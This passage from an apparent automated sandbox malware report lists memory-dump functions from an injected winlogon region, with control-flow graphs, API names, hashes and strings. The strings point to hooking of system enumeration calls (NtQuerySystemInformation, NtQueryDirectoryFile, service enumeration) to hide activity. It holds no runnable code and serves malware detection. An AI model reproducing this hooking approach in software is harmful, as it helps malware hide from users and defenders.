188->192 191->192 195 2e991755554-2e991755561 191->195 196 2e99175554f 192->196 197 2e991755548 192->197 200 2e991755564-2e9917555b9 call 2e9917585c0 195->200 201 2e991755563 195->201 196->195 197->196 198->186 207 2e9917554d0 199->207 208 2e9917554d2 199->208 210 2e9917555bb-2e9917555c3 200->210 211 2e9917555c8-2e991755661 call 2e991754510 call 2e991754470 VirtualProtect 200->211 201->200 202->188 203->186 207->186 208->184 216 2e991755671-2e9917556d1 211->216 217 2e991755663-2e991755668 GetLastError 211->217 216->140 217->216
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                    • Instruction ID: eebe92032a7fdedf781faa804f7575b613c740f96bbb6c7e2e6b86a645c85fbc
                                                    • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                    • Instruction Fuzzy Hash: E802BA32259BC586E7A0CB56F49435ABBA1F3C4794F11401AEA8E87BA9DF7CC494CF10
                                                    Function 000002E9917539E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocQuery
                                                    • String ID:
                                                    • API String ID: 31662377-0
                                                    • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                    • Instruction ID: bd37eb1f9fe1cce81840bdfd23b72ab3f02b45a8b3f74b5eeca5040b27afc49a
                                                    • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                    • Instruction Fuzzy Hash: 07315022759AC581EA70DA17E05835E67A4F388784F11052BF5CE06BBADF7CC2C08F20
                                                    Function 000002E99175328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                    • String ID:
                                                    • API String ID: 1683269324-0
                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction ID: 351c7813d095973389ab4a2bf15dbcd6c7863a8031ac115e2cdad26015686c69
                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction Fuzzy Hash: 56118031B946C382FB60AB33F84D76922A4B754345F92412FA916816B3EF79C0C48E70
                                                    Function 000002E991754DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                    • String ID:
                                                    • API String ID: 3733156554-0
                                                    • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                    • Instruction ID: d4000fd86275b36a03d69cb5381fd848dff25b8e8b72ec9c6e4ac05b9341f0d5
                                                    • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                    • Instruction Fuzzy Hash: DCF0302625CB85C0D631DB02E44934A6BA0F38C7D4F55011AFA8E03B6ADB3CC6C08F50
                                                    Function 000002E99172273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 2e99172273c-2e9917227a4 call 2e9917229d4 * 4 274 2e9917227aa-2e9917227ad 265->274 275 2e9917229b2 265->275 274->275 277 2e9917227b3-2e9917227b6 274->277 276 2e9917229b4-2e9917229d0 275->276 277->275 278 2e9917227bc-2e9917227bf 277->278 278->275 279 2e9917227c5-2e9917227e6 VirtualAlloc 278->279 279->275 280 2e9917227ec-2e99172280c 279->280 281 2e99172280e-2e991722836 280->281 282 2e991722838-2e99172283f 280->282 281->281 281->282 283 2e9917228df-2e9917228e6 282->283 284 2e991722845-2e991722852 282->284 286 2e9917228ec-2e991722901 283->286 287 2e991722992-2e9917229b0 283->287 284->283 285 2e991722858-2e99172286a LoadLibraryA 284->285 288 2e99172286c-2e991722878 285->288 289 2e9917228ca-2e9917228d2 285->289 286->287 290 2e991722907 286->290 287->276 292 2e9917228c5-2e9917228c8 288->292 289->285 293 2e9917228d4-2e9917228d9 289->293 291 2e99172290d-2e991722921 290->291 295 2e991722923-2e991722934 291->295 296 2e991722982-2e99172298c 291->296 292->289 297 2e99172287a-2e99172287d 292->297 293->283 298 2e99172293f-2e991722943 295->298 299 2e991722936-2e99172293d 295->299 296->287 296->291 300 2e99172287f-2e9917228a5 297->300 301 2e9917228a7-2e9917228b7 297->301 304 2e99172294d-2e991722951 298->304 305 2e991722945-2e99172294b 298->305 303 2e991722970-2e991722980 299->303 306 2e9917228ba-2e9917228c1 300->306 301->306 303->295 303->296 307 2e991722963-2e991722967 304->307 308 2e991722953-2e991722961 304->308 305->303 306->292 307->303 310 2e991722969-2e99172296c 307->310 308->303 310->303
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: AllocLibraryLoadVirtual
                                                    • String ID:
                                                    • API String ID: 3550616410-0
                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction ID: 0174b3c931968c58cb23d2eb9d8b9e4d39f5b79fd9c5245184543cdb20c18685
                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction Fuzzy Hash: A4616872B422D187DB54CF16C00872D7392F754BE4F19852ADF991778ADA38D893CB20
                                                    Function 000002E991751ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 000002E991751628: GetProcessHeap.KERNEL32 ref: 000002E991751633
                                                      • Part of subcall function 000002E991751628: HeapAlloc.KERNEL32 ref: 000002E991751642
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516B2
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DF
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917516F9
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751719
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751734
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751754
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175176F
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175178F
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517AA
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517CA
                                                    • Sleep.KERNEL32 ref: 000002E991751AD7
                                                    • SleepEx.KERNELBASE ref: 000002E991751ADD
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917517E5
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751805
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751820
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E991751840
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E99175185B
                                                      • Part of subcall function 000002E991751628: RegOpenKeyExW.ADVAPI32 ref: 000002E99175187B
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E991751896
                                                      • Part of subcall function 000002E991751628: RegCloseKey.ADVAPI32 ref: 000002E9917518A0
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1534210851-0
                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction ID: 98a2260962f66e790094138e64364fcbcff5423d27e2e98684da735ba5be122f
                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction Fuzzy Hash: 3731F1613816C342FF509B27D6493A913A4BB44BC6F0A542B9E1B87697FF34C8D1CA31

                                                    Non-executed Functions

                                                    Function 000002E991752B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 575 2e991752b2c-2e991752ba5 call 2e991772ce0 578 2e991752ee0-2e991752f03 575->578 579 2e991752bab-2e991752bb1 575->579 579->578 580 2e991752bb7-2e991752bba 579->580 580->578 581 2e991752bc0-2e991752bc3 580->581 581->578 582 2e991752bc9-2e991752bd9 GetModuleHandleA 581->582 583 2e991752bed 582->583 584 2e991752bdb-2e991752beb GetProcAddress 582->584 585 2e991752bf0-2e991752c0e 583->585 584->585 585->578 587 2e991752c14-2e991752c33 StrCmpNIW 585->587 587->578 588 2e991752c39-2e991752c3d 587->588 588->578 589 2e991752c43-2e991752c4d 588->589 589->578 590 2e991752c53-2e991752c5a 589->590 590->578 591 2e991752c60-2e991752c73 590->591 592 2e991752c75-2e991752c81 591->592 593 2e991752c83 591->593 594 2e991752c86-2e991752c8a 592->594 593->594 595 2e991752c9a 594->595 596 2e991752c8c-2e991752c98 594->596 597 2e991752c9d-2e991752ca7 595->597 596->597 598 2e991752d9d-2e991752da1 597->598 599 2e991752cad-2e991752cb0 597->599 600 2e991752da7-2e991752daa 598->600 601 2e991752ed2-2e991752eda 598->601 602 2e991752cc2-2e991752ccc 599->602 603 2e991752cb2-2e991752cbf call 2e99175199c 599->603 604 2e991752dac-2e991752db8 call 2e99175199c 600->604 605 2e991752dbb-2e991752dc5 600->605 601->578 601->591 607 2e991752cce-2e991752cdb 602->607 608 2e991752d00-2e991752d0a 602->608 603->602 604->605 612 2e991752df5-2e991752df8 605->612 613 2e991752dc7-2e991752dd4 605->613 607->608 615 2e991752cdd-2e991752cea 607->615 609 2e991752d3a-2e991752d3d 608->609 610 2e991752d0c-2e991752d19 608->610 617 2e991752d3f-2e991752d49 call 2e991751bbc 609->617 618 2e991752d4b-2e991752d58 lstrlenW 609->618 610->609 616 2e991752d1b-2e991752d28 610->616 621 2e991752dfa-2e991752e03 call 2e991751bbc 612->621 622 2e991752e05-2e991752e12 lstrlenW 612->622 613->612 620 2e991752dd6-2e991752de3 613->620 623 2e991752ced-2e991752cf3 615->623 626 2e991752d2b-2e991752d31 616->626 617->618 633 2e991752d93-2e991752d98 617->633 628 2e991752d5a-2e991752d64 618->628 629 2e991752d7b-2e991752d8d call 2e991753844 618->629 630 2e991752de6-2e991752dec 620->630 621->622 641 2e991752e4a-2e991752e55 621->641 624 2e991752e35-2e991752e3f call 2e991753844 622->624 625 2e991752e14-2e991752e1e 622->625 632 2e991752cf9-2e991752cfe 623->632 623->633 635 2e991752e42-2e991752e44 624->635 625->624 634 2e991752e20-2e991752e33 call 2e99175152c 625->634 626->633 636 2e991752d33-2e991752d38 626->636 628->629 639 2e991752d66-2e991752d79 call 2e99175152c 628->639 629->633 629->635 640 2e991752dee-2e991752df3 630->640 630->641 632->608 632->623 633->635 634->624 634->641 635->601 635->641 636->609 636->626 639->629 639->633 640->612 640->630 646 2e991752ecc-2e991752ed0 641->646 647 2e991752e57-2e991752e5b 641->647 646->601 651 2e991752e5d-2e991752e61 647->651 652 2e991752e63-2e991752e7d call 2e9917585c0 647->652 651->652 654 2e991752e80-2e991752e83 651->654 652->654 657 2e991752ea6-2e991752ea9 654->657 658 2e991752e85-2e991752ea3 call 2e9917585c0 654->658 657->646 660 2e991752eab-2e991752ec9 call 2e9917585c0 657->660 658->657 660->646
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                    • API String ID: 2119608203-3850299575
                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction ID: 9267f257902aa87408aaac54b14cc2c1c9bedbda9888c08ae2a81d07cc4cf480
                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction Fuzzy Hash: 49B19F22250BD2C6EB698F27D4487A963A5F748B84F56501FEE0953796EF35CCC0CB60
                                                    Function 000002E991757D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction ID: 0216bfbab142289af890d8c45534b75c134c54bc5fdd387169f2726022cc0a09
                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction Fuzzy Hash: F6318372245BC19AEB609F62E8443ED7364F784744F85402EEB4D97B95EF38C588CB20
                                                    Function 000002E99175D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction ID: a23a05519f5be50e9521a24267438afb78831fdbfdb93237bbf99c1e24bec194
                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction Fuzzy Hash: C0319332254FC196EB60DF26E84439E73A4F789794F91012AEA9D43B96DF38C185CF10
                                                    Function 000002E991757960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction ID: 4a3cbd926c2ff67caed56cc86b37f60de1dd5d3bcd68790c06f0eef6869e381a
                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction Fuzzy Hash: 31117322750F418AEB00CF61E8593A833B4F318758F850E26EA6D82795DF78C194C790
                                                    Function 000002E99175DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                    • Instruction ID: 7dd61c585698414271cd24679a03e8391d528d7793271459a039ca350cc5193d
                                                    • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                    • Instruction Fuzzy Hash: CC51D1227107C189FB20DB73E94879A7BA5F7447E8F15411AEE9867B9ADF38C481CB10
                                                    Function 000002E9917336F0 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                    • Instruction ID: 4bc408d1f9796abe8f7ab8b61ca77b790a949b81e889ac1e3cced604fc51a0eb
                                                    • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                    • Instruction Fuzzy Hash: C3F062B17542958EEBE88F29F84671A77E2F318380FD0801ED68983B54D23C80A1CF28
                                                    Function 000002E991766218 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                    • Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
                                                    • Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                    • Instruction Fuzzy Hash:
                                                    Function 000002E991766208 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1d6651aee64f03e14f2bc133940db4ae2d65b2322fd30231df270c6176abf77
                                                    • Instruction ID: 52f60df3fc584bb2755b9902eca0ea292f076f9c021720799fa571c6a82a7638
                                                    • Opcode Fuzzy Hash: d1d6651aee64f03e14f2bc133940db4ae2d65b2322fd30231df270c6176abf77
                                                    • Instruction Fuzzy Hash:
                                                    Function 000002E9917512BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                    • String ID: d
                                                    • API String ID: 2005889112-2564639436
                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction ID: faf9fcae4cad09d4b21471a3c83bc15139729c09b9c22fc87df00bbc9025f63a
                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction Fuzzy Hash: B3516D72240BC5C6EB54CF62E44835AB7A1F389FC9F85412AEA4A8771ADF3CC085CB51
                                                    Function 000002E991751D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                    • API String ID: 4175298099-1975688563
                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction ID: 4753043bf12ce9e32f38f3c1a54f8f46ce1ac6560c3b79c386cbf99cf72d279c
                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction Fuzzy Hash: FA31D664191ACBA1FB00EFA7E85D6D42320B710384FC3101B945A461B79F3886CACF71
                                                    Function 000002E991726910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 417 2e991726910-2e991726916 418 2e991726951-2e99172695b 417->418 419 2e991726918-2e99172691b 417->419 420 2e991726a78-2e991726a8d 418->420 421 2e99172691d-2e991726920 419->421 422 2e991726945-2e991726984 call 2e991726fc0 419->422 425 2e991726a9c-2e991726ab6 call 2e991726e54 420->425 426 2e991726a8f 420->426 423 2e991726922-2e991726925 421->423 424 2e991726938 __scrt_dllmain_crt_thread_attach 421->424 437 2e99172698a-2e99172699f call 2e991726e54 422->437 438 2e991726a52 422->438 429 2e991726931-2e991726936 call 2e991726f04 423->429 430 2e991726927-2e991726930 423->430 433 2e99172693d-2e991726944 424->433 440 2e991726aef-2e991726b20 call 2e991727190 425->440 441 2e991726ab8-2e991726aed call 2e991726f7c call 2e991726e1c call 2e991727318 call 2e991727130 call 2e991727154 call 2e991726fac 425->441 431 2e991726a91-2e991726a9b 426->431 429->433 450 2e991726a6a-2e991726a77 call 2e991727190 437->450 451 2e9917269a5-2e9917269b6 call 2e991726ec4 437->451 442 2e991726a54-2e991726a69 438->442 452 2e991726b31-2e991726b37 440->452 453 2e991726b22-2e991726b28 440->453 441->431 450->420 470 2e991726a07-2e991726a11 call 2e991727130 451->470 471 2e9917269b8-2e9917269dc call 2e9917272dc call 2e991726e0c call 2e991726e38 call 2e99172ac0c 451->471 454 2e991726b39-2e991726b43 452->454 455 2e991726b7e-2e991726b94 call 2e99172268c 452->455 453->452 459 2e991726b2a-2e991726b2c 453->459 460 2e991726b4f-2e991726b5d call 2e991735780 454->460 461 2e991726b45-2e991726b4d 454->461 478 2e991726bcc-2e991726bce 455->478 479 2e991726b96-2e991726b98 455->479 466 2e991726c1f-2e991726c2c 459->466 467 2e991726b63-2e991726b78 call 2e991726910 460->467 482 2e991726c15-2e991726c1d 460->482 461->467 467->455 467->482 470->438 490 2e991726a13-2e991726a1f call 2e991727180 470->490 471->470 519 2e9917269de-2e9917269e5 __scrt_dllmain_after_initialize_c 471->519 480 2e991726bd0-2e991726bd3 478->480 481 2e991726bd5-2e991726bea call 2e991726910 478->481 479->478 487 2e991726b9a-2e991726bbc call 2e99172268c call 2e991726a78 479->487 480->481 480->482 481->482 499 2e991726bec-2e991726bf6 481->499 482->466 487->478 512 2e991726bbe-2e991726bc6 call 2e991735780 487->512 508 2e991726a21-2e991726a2b call 2e991727098 490->508 509 2e991726a45-2e991726a50 490->509 505 2e991726c01-2e991726c11 call 2e991735780 499->505 506 2e991726bf8-2e991726bff 499->506 505->482 506->482 508->509 520 2e991726a2d-2e991726a3b 508->520 509->442 512->478 519->470 521 2e9917269e7-2e991726a04 call 2e99172abc8 519->521 520->509 521->470
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3041695622.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991720000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                    • API String ID: 190073905-1786718095
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: e16fa48834a59c6cd4a499f0462a1a18f190ef002cbaf03bf6bfe41264d5c29d
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 9F81A4617822C386FB50AB27D44939922A1FB99780F96482FBD4547797DB38C9C78F30
                                                    Function 000002E99175CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 000002E99175CE37
                                                    • FlsGetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE4C
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE6D
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CE9A
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEAB
                                                    • FlsSetValue.KERNEL32(?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CEBC
                                                    • SetLastError.KERNEL32 ref: 000002E99175CED7
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002E991760A6B,?,?,?,000002E99176045C,?,?,?,000002E99175C84F), ref: 000002E99175CF0D
                                                    • FlsSetValue.KERNEL32(?,?,00000001,000002E99175ECCC,?,?,?,?,000002E99175BF9F,?,?,?,?,?,000002E991757AB0), ref: 000002E99175CF2C
                                                      • Part of subcall function 000002E99175D6CC: HeapAlloc.KERNEL32 ref: 000002E99175D721
